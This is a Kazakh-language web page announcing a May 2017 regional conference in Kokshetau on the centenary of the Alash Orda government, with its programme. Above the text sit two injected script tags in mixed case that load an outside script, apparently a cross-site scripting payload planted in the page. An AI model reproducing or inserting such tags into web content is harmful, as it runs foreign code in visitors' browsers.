<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

24.05.2017

Құрметті көкшетаулық зиялы қауым өкілдері!

Биыл ұлт тарихындағы ұлы оқиғалардың бірегейі - Алаш Орда үкіметінің құрылғанына 100 жыл толуы. Осыған орай, 25-26 мамыр күндері Ж.Мусин атындағы жоғары қазақ педагогикалық колледжінің ұйымдастыруымен "АЛАШ ТАҒЫЛЫМЫ ЖӘНЕ ТӘУЕЛСІЗДІК" атты аймақтық ғылыми-практикалық конференция өтеді. Келемін деушілерге есік ашық! Алаш кемеңгерлерінің ұлт мүддесі жолында жасаған ұлы істерін бірге насихаттайық!!! 

Конференция бағдарламасы:
- 25 мамыр, сағат 16.00-де колледж ғимаратында "Алаш қозғалысының тарихи маңызы мен өміршеңдігі" атты республика көлемінде танымал алаштанушы ғалымдардың көкшелік зиялы қауым өкілдерімен пікірлесу алаңы;
- 26 мамыр, сағат 10.00-де Ш.Құсайынов атындағы қазақ музыкалық-драма театрында конференцияның пленарлық мәжілісі;
14.30-да колледж ғимаратында панельдік сессия 3 бағытта жүргізіледі.

Просмотров: 955


Пікір қосу



Деректерді қолтаңбаға қосу